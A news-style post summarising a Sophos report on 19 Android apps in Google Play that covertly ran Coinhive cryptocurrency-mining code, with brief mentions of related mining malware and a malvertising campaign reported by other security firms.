It seems that there is no end to the crypto-jacking menace that’s been affecting the web as of late. This post is based on a 13-page report released last week by Sophos, a UK cyber-security firm. Based on the security firm, 19 Android apps were discovered by its engineers that were uploaded and made available through the official Google Play Store.
These 19 apps, according to Sophos, were covertly loading an instance of the Coinhive script behind the users’ back. After the analysis done by the security researchers, they believed that the app authors are the same person or group. These app developers hid the Coinhive JavaScript mining code inside the HTML files in the assets folder of the apps.
When a user opens the apps and the apps open a WebView (Android stripped-down) browser instance, the malicious code is also executed. Whereas in some circumstances, if the apps did not validate opening a browser window, the WebView component is hidden from view while the mining code run in the background. On the other hand, if the app is a news reader or a tutorial viewer, the Coinhive in-browser JavaScript mining code runs along the app’s legitimate content while the unknowing user is using the app.
Using four developer accounts, Sophos was able to discover this kind of technique in the 19 Android apps. Even though most of the infected apps barely has 100-500 installs, one app in particular (extreme.action.wwe.wrestin), was installed over 100,000 to 500,000 Android devices.
These 19 apps were uploaded around Christmas on the Google Play Store. Sophos already reported their discovery about the infected apps to Google – all of which, at the time of writing, has already been removed from the official Play Store. Sophos made a list of all the 19 Coinhive JavaScript infected apps on its report at page 7 where users can review the list to check if they have installed any of the 19 Android apps in their devices. While on page 10 of the report, Sophos made another list of malicious apps but the apps on this list do not load the Coinhive JavaScript miner but embed the native cpuminer library instead to mine Bitcoin and Litecoin. Sophoes referred to this Android malware as “CoinMiner” and states that it was found embedded on 10 apps that were made available through the website called coandroid.ru website which is a third party app store for Android.
Although there are tons of oversaturated articles about illegal crypto-currency mining made by many news sites online, you should know that the mining crypto-currency on smartphones could damage the device permanently. This is based on the analysis made by researchers from Kaspersky who proved this theory when they discovered the Android malware called “Loapi”.
Note that you don’t necessarily have to install a malware-laden Android app on your device to be affected. Just yesterday, security researchers from Malwarebytes found a malvertising campaign that targets Internet users who are using Android mobile browsers. The malvertising campaign was discovered to be using a malicious code which was hidden in ads to redirect users to sites that cater to Monero mining while the unsuspecting users were trying to solve a CAPTCHA field in the web page they were redirected to.